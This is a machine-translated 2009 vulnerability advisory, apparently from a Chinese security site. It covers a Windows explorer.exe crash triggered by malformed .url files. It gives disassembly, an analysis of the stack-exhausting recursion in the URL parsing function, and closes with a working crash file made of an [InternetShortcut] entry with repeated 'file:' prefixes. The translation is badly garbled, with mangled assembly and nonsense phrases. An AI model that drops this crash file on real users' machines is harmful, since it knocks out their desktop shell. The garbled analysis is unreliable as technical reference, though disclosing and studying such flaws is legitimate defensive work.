Parse the URL format vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200925635
Type myhack58
Reporter 佚名
Modified 2009-12-15T00:00:00


  1. Description Windows Shell program explorer. exe in the process contains malformed data“. url”file when there is a problem, a local attacker could exploit this vulnerability to cause the user's machine on the explorer. exe process crashes. If explorer. exe parsed contains a special format of the URL*. url of the file, then it will lead to a crash. Even through the Resource Manager attempted to delete this file when also trigger the crash. The current vendor has not provided the patch or the upgrade program, so far the vulnerability is still valid.

Assembly code, The actual error address: 7D5CE6B9 push ecx 7D5CE6BA lea ecx, dword ptr [esp+8] 7D5CE6BE sub ecx, 1 0 0 0 7D5CE6C4 sub eax, 1 0 0 0 7D5CE6C9 test dword ptr [ecx], eax exception address 7D5CE6CB cmp eax, 1 0 0 0 7D5CE6D0 jnb short 7D5CE6BE 7D5CE6D2 sub ecx, eax 7D5CE6D4 mov eax, esp 7D5CE6D6 test dword ptr [ecx], eax 7D5CE6D8 mov esp, ecx 7D5CE6DA mov ecx, dword ptr [eax] 7D5CE6DC mov eax, dword ptr [eax+4] 7D5CE6DF push eax 7D5CE6E0 retn

  1. A detailed analysis of the In the IDA's disassembly, it was found: public: virtual long stdcall CFileUrlStub::ParseDisplayName(struct HWND , struct IBindCtx , unsigned short , unsigned long , struct _ITEMIDLIST * , unsigned long ) proc near . text:7D6A112C ; DATA XREF: . text:7D5A327Co . text:7D6A112C . text:7D6A112C var_20A0 = dword ptr-20A0h . text:7D6A112C var_209C = dword ptr-209Ch . text:7D6A112C var_2098 = dword ptr-2098h . text:7D6A112C Srch = word ptr-2094h . text:7D6A112C var_104C = dword ptr-104Ch . text:7D6A112C var_4 = dword ptr -4 . text:7D6A112C arg_C = dword ptr 14h . text:7D6A112C arg_14 = dword ptr 1Ch . text:7D6A112C arg_18 = dword ptr 20h . text:7D6A112C . text:7D6A112C mov edi, edi . text:7D6A112E push ebp . text:7D6A112F mov ebp, esp . text:7D6A1131 mov eax, 20A0h local stack length . text:7D6A1136 call chkstk error function address . text:7D6A1136 . text:7D6A113B mov eax, securitycookie . text:7D6A1140 push ebx . text:7D6A1141 mov ebx, [ebp+arg_18] . text:7D6A1144 push esi . text:7D6A1145 mov esi, [ebp+arg_14] . text:7D6A1148 push edi . text:7D6A1149 mov edi, [ebp+arg_C] . text:7D6A114C push edi . text:7D6A114D mov [ebp+var_4], eax . text:7D6A1150 call ds:UrlGetLocationW(x) . text:7D6A1156 push 0 . text:7D6A1158 mov [ebp+var_2098], eax . text:7D6A115E push 6 . text:7D6A1160 lea eax, [ebp+var_209C] . text:7D6A1166 push eax . text:7D6A1167 lea eax, [ebp+var_104C+2] . text:7D6A116D push eax . text:7D6A116E push edi . text:7D6A116F mov [ebp+var_20A0], 824h . text:7D6A1179 mov [ebp+var_209C], 823h . text:7D6A1183 call ds:UrlGetPartW(x,x,x,x,x) . text:7D6A1189 test eax, eax . text:7D6A118B jl short loc_7D6A11A1 . text:7D6A118B . text:7D6A118D cmp [ebp+var_209C], 0 . text:7D6A1194 jz short loc_7D6A11A1 . text:7D6A1194 . text:7D6A1196 mov word ptr [ebp+var_104C], 3Fh . text:7D6A119F jmp short loc_7D6A11A9 . text:7D6A119F . text:7D6A11A1; --------------------------------------------------------------------------- . text:7D6A11A1 . text:7D6A11A1 loc_7D6A11A1: ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND ,IBindCtx ,ushort ,ulong ,_ITEMIDLIST * ,ulong )+5Fj . text:7D6A11A1 ; CFileUrlStub::ParseDisplayName(HWND ,IBindCtx ,ushort ,ulong ,_ITEMIDLIST * ,ulong )+68j . text:7D6A11A1 and word ptr [ebp+var_104C], 0 . text:7D6A11A1 . text:7D6A11A9 . text:7D6A11A9 loc_7D6A11A9: ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ ,IBindCtx ,ushort ,ulong ,_ITEMIDLIST * ,ulong )+73j . text:7D6A11A9 push 0 . text:7D6A11AB lea eax, [ebp+var_20A0] . text:7D6A11B1 push eax . text:7D6A11B2 lea eax, [ebp+Srch] . text:7D6A11B8 push eax . text:7D6A11B9 push edi . text:7D6A11BA call ds:PathCreateFromUrlW(x,x,x,x) the function is recursive . text:7D6A11C0 test eax, eax . text:7D6A11C2 jl short loc_7D6A121B . text:7D6A11C2 . text:7D6A11C4 push ebx ; int . text:7D6A11C5 push esi ; int . text:7D6A11C6 xor edi, edi . text:7D6A11C8 push edi ; char . text:7D6A11C9 push edi ; int . text:7D6A11CA lea eax, [ebp+Srch] . text:7D6A11D0 push eax ; lpSrch . text:7D6A11D1 call ILCreateFromPathEx(x,x,x,x,x)

Summary: Due to the parameter checking is not strict, caused this function to stop recursive calls, each with a stack 0x20A0 it. Due to the windows thread's stack is not infinitely increased, more than his maximum range on the wrong. When for the first 2 to 8 calls later, reached the windows stack has the maximum allowed value, the explorer abnormal program exit. 3. Use code [InternetShortcut] url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:

The above text Paul into the URL suffix of the file, you can cause the desktop app(Expolore.exe)has an error.